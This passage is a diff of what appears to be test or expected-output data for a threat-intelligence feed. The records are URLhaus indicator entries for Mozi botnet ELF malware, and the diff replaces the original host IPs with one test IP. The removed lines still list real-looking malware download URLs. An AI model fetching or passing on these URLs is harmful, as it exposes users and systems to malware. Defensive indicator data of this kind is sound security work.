"{\"id\":\"961060\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961060/\",\"url\":\"http://89.160.20.156:43010/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -23503,18 +23503,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://125.41.217.246:37886/Mozi.m",
+ "original": "http://89.160.20.156:37886/Mozi.m",
 "scheme": "http",
 "port": 37886,
- "domain": "125.41.217.246",
- "full": "http://125.41.217.246:37886/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:37886/Mozi.m"
 },
- "ip": "125.41.217.246"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694316691Z",
- "original": "{\"id\":\"961061\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961061/\",\"url\":\"http://125.41.217.246:37886/Mozi.m\",\"url_status\":\"offline\",\"host\":\"125.41.217.246\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028072500Z",
+ "original": "{\"id\":\"961061\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961061/\",\"url\":\"http://89.160.20.156:37886/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -23552,18 +23552,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://182.116.77.111:40153/Mozi.m",
+ "original": "http://89.160.20.156:40153/Mozi.m",
 "scheme": "http",
 "port": 40153,
- "domain": "182.116.77.111",
- "full": "http://182.116.77.111:40153/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:40153/Mozi.m"
 },
- "ip": "182.116.77.111"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694320197Z",
- "original": "{\"id\":\"961062\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961062/\",\"url\":\"http://182.116.77.111:40153/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.116.77.111\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028079500Z",
+ "original": "{\"id\":\"961062\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961062/\",\"url\":\"http://89.160.20.156:40153/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -23601,18 +23601,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://182.117.92.19:34305/Mozi.a",
+ "original": "http://89.160.20.156:34305/Mozi.a",
 "scheme": "http",
 "port": 34305,
- "domain": "182.117.92.19",
- "full": "http://182.117.92.19:34305/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:34305/Mozi.a"
 },
- "ip": "182.117.92.19"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694323603Z",
- "original": "{\"id\":\"961063\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961063/\",\"url\":\"http://182.117.92.19:34305/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.117.92.19\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028086400Z",
+ "original": "{\"id\":\"961063\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961063/\",\"url\":\"http://89.160.20.156:34305/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -23650,18 +23650,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://182.127.97.21:35653/Mozi.m",
+ "original": "http://89.160.20.156:35653/Mozi.m",
 "scheme": "http",
 "port": 35653,
- "domain": "182.127.97.21",
- "full": "http://182.127.97.21:35653/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:35653/Mozi.m"
 },
- "ip": "182.127.97.21"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694327200Z",
- "original": "{\"id\":\"961064\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961064/\",\"url\":\"http://182.127.97.21:35653/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.127.97.21\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028093200Z",
+ "original": "{\"id\":\"961064\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961064/\",\"url\":\"http://89.160.20.156:35653/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -23699,18 +23699,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://117.242.209.98:48908/Mozi.m",
+ "original": "http://89.160.20.156:48908/Mozi.m",
 "scheme": "http",
 "port": 48908,
- "domain": "117.242.209.98",
- "full": "http://117.242.209.98:48908/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:48908/Mozi.m"
 },
- "ip": "117.242.209.98"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694330647Z",
- "original": "{\"id\":\"961065\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961065/\",\"url\":\"http://117.242.209.98:48908/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.242.209.98\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028100200Z",
+ "original": "{\"id\":\"961065\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961065/\",\"url\":\"http://89.160.20.156:48908/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -23748,18 +23748,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://113.118.12.200:40035/Mozi.m",
+ "original": "http://89.160.20.156:40035/Mozi.m",
 "scheme": "http",
 "port": 40035,
- "domain": "113.118.12.200",
- "full": "http://113.118.12.200:40035/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:40035/Mozi.m"
 },
- "ip": "113.118.12.200"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694334414Z",
- "original": "{\"id\":\"961058\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961058/\",\"url\":\"http://113.118.12.200:40035/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.118.12.200\",\"date_added\":\"2021-01-14 17:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028107Z",
+ "original": "{\"id\":\"961058\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961058/\",\"url\":\"http://89.160.20.156:40035/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -23797,18 +23797,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://117.222.166.125:54461/Mozi.a",
+ "original": "http://89.160.20.156:54461/Mozi.a",
 "scheme": "http",
 "port": 54461,
- "domain": "117.222.166.125",
- "full": "http://117.222.166.125:54461/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:54461/Mozi.a"
 },
- "ip": "117.222.166.125"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694338151Z",
- "original": "{\"id\":\"961055\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961055/\",\"url\":\"http://117.222.166.125:54461/Mozi.a\",\"url_status\":\"offline\",\"host\":\"117.222.166.125\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028114Z",
+ "original": "{\"id\":\"961055\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961055/\",\"url\":\"http://89.160.20.156:54461/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -23846,18 +23846,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://116.75.214.130:51991/Mozi.m",
+ "original": "http://89.160.20.156:51991/Mozi.m",
 "scheme": "http",
 "port": 51991,
- "domain": "116.75.214.130",
- "full": "http://116.75.214.130:51991/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:51991/Mozi.m"
 },
- "ip": "116.75.214.130"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694342269Z",
- "original": "{\"id\":\"961056\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961056/\",\"url\":\"http://116.75.214.130:51991/Mozi.m\",\"url_status\":\"offline\",\"host\":\"116.75.214.130\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028120900Z",
+ "original": "{\"id\":\"961056\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961056/\",\"url\":\"http://89.160.20.156:51991/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -23895,18 +23895,18 @@
 "provider": "geenensp",
 "url": {
 "path": "/i",
- "original": "http://112.168.65.51:41143/i",
+ "original": "http://89.160.20.156:41143/i",
 "scheme": "http",
 "port": 41143,
- "domain": "112.168.65.51",
- "full": "http://112.168.65.51:41143/i"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:41143/i"
 },
- "ip": "112.168.65.51"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694345765Z",
- "original": "{\"id\":\"961057\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961057/\",\"url\":\"http://112.168.65.51:41143/i\",\"url_status\":\"online\",\"host\":\"112.168.65.51\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
+ "ingested": "2021-12-13T08:40:08.028127700Z",
+ "original": "{\"id\":\"961057\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961057/\",\"url\":\"http://89.160.20.156:41143/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -23944,18 +23944,18 @@
 "provider": "geenensp",
 "url": {
 "path": "/i",
- "original": "http://221.15.254.11:51095/i",
+ "original": "http://89.160.20.156:51095/i",
 "scheme": "http",
 "port": 51095,
- "domain": "221.15.254.11",
- "full": "http://221.15.254.11:51095/i"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:51095/i"
 },
- "ip": "221.15.254.11"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694349422Z",
- "original": "{\"id\":\"961054\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961054/\",\"url\":\"http://221.15.254.11:51095/i\",\"url_status\":\"online\",\"host\":\"221.15.254.11\",\"date_added\":\"2021-01-14 17:02:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
+ "ingested": "2021-12-13T08:40:08.028134600Z",
+ "original": "{\"id\":\"961054\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961054/\",\"url\":\"http://89.160.20.156:51095/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:02:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -23993,18 +23993,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://58.255.142.90:36558/Mozi.a",
+ "original": "http://89.160.20.156:36558/Mozi.a",
 "scheme": "http",
 "port": 36558,
- "domain": "58.255.142.90",
- "full": "http://58.255.142.90:36558/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:36558/Mozi.a"
 },
- "ip": "58.255.142.90"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694353079Z",
- "original": "{\"id\":\"961053\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961053/\",\"url\":\"http://58.255.142.90:36558/Mozi.a\",\"url_status\":\"online\",\"host\":\"58.255.142.90\",\"date_added\":\"2021-01-14 16:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028141600Z",
+ "original": "{\"id\":\"961053\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961053/\",\"url\":\"http://89.160.20.156:36558/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -24042,18 +24042,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.96.37.94:47548/Mozi.m",
+ "original": "http://89.160.20.156:47548/Mozi.m",
 "scheme": "http",
 "port": 47548,
- "domain": "59.96.37.94",
- "full": "http://59.96.37.94:47548/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:47548/Mozi.m"
 },
- "ip": "59.96.37.94"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694356836Z",
- "original": "{\"id\":\"961050\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961050/\",\"url\":\"http://59.96.37.94:47548/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.96.37.94\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028148500Z",
+ "original": "{\"id\":\"961050\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961050/\",\"url\":\"http://89.160.20.156:47548/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -24091,18 +24091,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.97.172.183:35796/Mozi.m",
+ "original": "http://89.160.20.156:35796/Mozi.m",
 "scheme": "http",
 "port": 35796,
- "domain": "59.97.172.183",
- "full": "http://59.97.172.183:35796/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:35796/Mozi.m"
 },
- "ip": "59.97.172.183"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694360453Z",
- "original": "{\"id\":\"961051\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961051/\",\"url\":\"http://59.97.172.183:35796/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.97.172.183\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028155300Z",
+ "original": "{\"id\":\"961051\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961051/\",\"url\":\"http://89.160.20.156:35796/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -24140,18 +24140,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://58.255.142.229:42765/Mozi.m",
+ "original": "http://89.160.20.156:42765/Mozi.m",
 "scheme": "http",
 "port": 42765,
- "domain": "58.255.142.229",
- "full": "http://58.255.142.229:42765/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:42765/Mozi.m"
 },
- "ip": "58.255.142.229"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694363949Z",
- "original": "{\"id\":\"961052\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961052/\",\"url\":\"http://58.255.142.229:42765/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.255.142.229\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028162300Z",
+ "original": "{\"id\":\"961052\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961052/\",\"url\":\"http://89.160.20.156:42765/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -24189,18 +24189,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://189.51.106.169:37388/Mozi.a",
+ "original": "http://89.160.20.156:37388/Mozi.a",
 "scheme": "http",
 "port": 37388,
- "domain": "189.51.106.169",
- "full": "http://189.51.106.169:37388/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:37388/Mozi.a"
 },
- "ip": "189.51.106.169"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694367706Z",
- "original": "{\"id\":\"961048\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961048/\",\"url\":\"http://189.51.106.169:37388/Mozi.a\",\"url_status\":\"offline\",\"host\":\"189.51.106.169\",\"date_added\":\"2021-01-14 16:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028169300Z",
+ "original": "{\"id\":\"961048\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961048/\",\"url\":\"http://89.160.20.156:37388/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -24238,18 +24238,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://222.140.170.6:56849/Mozi.m",
+ "original": "http://89.160.20.156:56849/Mozi.m",
 "scheme": "http",
 "port": 56849,
- "domain": "222.140.170.6",
- "full": "http://222.140.170.6:56849/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:56849/Mozi.m"
 },
- "ip": "222.140.170.6"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694371383Z",
- "original": "{\"id\":\"961049\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961049/\",\"url\":\"http://222.140.170.6:56849/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.140.170.6\",\"date_added\":\"2021-01-14 16:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028176200Z",
+ "original": "{\"id\":\"961049\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961049/\",\"url\":\"http://89.160.20.156:56849/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -24287,18 +24287,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://186.33.123.64:35574/Mozi.m",
+ "original": "http://89.160.20.156:35574/Mozi.m",
 "scheme": "http",
 "port": 35574,
- "domain": "186.33.123.64",
- "full": "http://186.33.123.64:35574/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:35574/Mozi.m"
 },
- "ip": "186.33.123.64"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694374950Z",
- "original": "{\"id\":\"961047\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961047/\",\"url\":\"http://186.33.123.64:35574/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.123.64\",\"date_added\":\"2021-01-14 16:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028183300Z",
+ "original": "{\"id\":\"961047\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961047/\",\"url\":\"http://89.160.20.156:35574/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -24336,18 +24336,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://123.10.187.158:46947/Mozi.m",
+ "original": "http://89.160.20.156:46947/Mozi.m",
 "scheme": "http",
 "port": 46947,
- "domain": "123.10.187.158",
- "full": "http://123.10.187.158:46947/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:46947/Mozi.m"
 },
- "ip": "123.10.187.158"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694378396Z",
- "original": "{\"id\":\"961046\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961046/\",\"url\":\"http://123.10.187.158:46947/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.10.187.158\",\"date_added\":\"2021-01-14 16:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028190300Z",
